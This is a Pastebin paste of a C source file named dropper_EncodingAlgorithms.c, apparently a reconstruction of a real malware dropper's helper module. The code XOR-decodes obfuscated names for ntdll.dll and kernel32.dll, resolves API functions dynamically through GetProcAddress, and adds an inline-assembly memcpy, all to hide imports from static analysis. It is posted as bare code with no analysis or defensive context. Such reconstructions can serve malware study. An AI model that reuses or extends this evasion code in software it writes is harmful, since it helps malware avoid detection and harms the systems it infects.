Advertisement
FlyFar

dropper_EncodingAlgorithms.c

Feb 19th, 2023
509
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.06 KB | Cybersecurity | 0 0
  1. #include "A. EncodingAlgorithms.h"
  2. #include "config.h"
  3.  
  4. // 85% (C) CODE MATCH -> [CODE OK]
  5. void DecodeModuleNameA(const WORD *lpEncoded, CHAR *lpszPlain)
  6. {
  7.     if(!lpEncoded)
  8.     {
  9.         *lpszPlain = 0;
  10.         return;
  11.     }
  12.    
  13.     for(; ; lpEncoded++, lpszPlain++)
  14.     {
  15.         *lpszPlain = *(BYTE*)lpEncoded ^ (BYTE)X_STRING_KEY;
  16.         if(*(BYTE*)lpEncoded == (BYTE)X_STRING_KEY)
  17.             break;
  18.     }
  19. }
  20.  
  21. // 70% (C) CODE MATCH -> [CODE OK]
  22. void DecodeModuleNameW(const WORD *lpEncoded, WCHAR *lpszPlain)
  23. {
  24.     if(!lpEncoded)
  25.     {
  26.         *lpszPlain = 0;
  27.         return;
  28.     }
  29.    
  30.     for(; ; lpEncoded++, lpszPlain++)
  31.     {
  32.         *lpszPlain = *lpEncoded ^ X_STRING_KEY;
  33.         if(*lpEncoded == X_STRING_KEY)
  34.             break;
  35.     }
  36. }
  37.  
  38. const WORD ENCODED_NTDLL_DLL[10] =
  39. {
  40.     0xAE7C, 0xAE66, 0xAE76, 0xAE7E,
  41.     0xAE7E, 0xAE3C, 0xAE76, 0xAE7E,
  42.     0xAE7E, 0xAE12
  43. };
  44.  
  45. // 100% (C) CODE MATCH
  46. HMODULE GetModuleNTDLL(void)
  47. {
  48.     WCHAR szModuleName[100];
  49.  
  50.     DecodeModuleNameW(ENCODED_NTDLL_DLL, szModuleName);
  51.     return GetModuleHandleW(szModuleName);
  52. }
  53.  
  54. // 100% (C) CODE MATCH
  55. FARPROC GetFunctionFromModule(const WORD *lpEncodedModule, const WORD *lpEncodedFunc)
  56. {
  57.     WCHAR szModule[100];
  58.     CHAR szFunc[100];
  59.  
  60.     DecodeModuleNameW(lpEncodedModule, szModule);
  61.     DecodeModuleNameA(lpEncodedFunc, szFunc);
  62.    
  63.     return GetProcAddress(GetModuleHandleW(szModule), szFunc);
  64. }
  65.  
  66. // 100% (ASM) CODE MATCH
  67. __declspec(naked) void __memcpy(void *lpTo, const void *lpFrom, size_t nSize)
  68. {
  69.     __asm {
  70.         push    ebp
  71.         mov     ebp, esp
  72.         push    esi
  73.         push    edi
  74.         mov     edi, lpTo
  75.         mov     esi, lpFrom
  76.         mov     ecx, nSize
  77.         rep movsb
  78.         pop     edi
  79.         pop     esi
  80.         pop     ebp
  81.         retn
  82.     }
  83. }
  84.  
  85. const WORD ENCODED_KERNEL32_DLL[13] =
  86. {
  87.     0xAE79, 0xAE77, 0xAE60, 0xAE7C,
  88.     0xAE77, 0xAE7E, 0xAE21, 0xAE20,
  89.     0xAE3C, 0xAE76, 0xAE7E, 0xAE7E,
  90.     0xAE12
  91. };
  92.  
  93. // 100% (C) CODE MATCH
  94. FARPROC GetFunctionFromKERNEL32(const WORD *lpEncodedFunc)
  95. {
  96.     return GetFunctionFromModule(ENCODED_KERNEL32_DLL, lpEncodedFunc);
  97. }
  98.  
  99. // 100% (C) CODE MATCH
  100. FARPROC GetFunctionFromNTDLL(const WORD *lpEncodedFunc)
  101. {
  102.     return GetFunctionFromModule(ENCODED_NTDLL_DLL, lpEncodedFunc);
  103. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement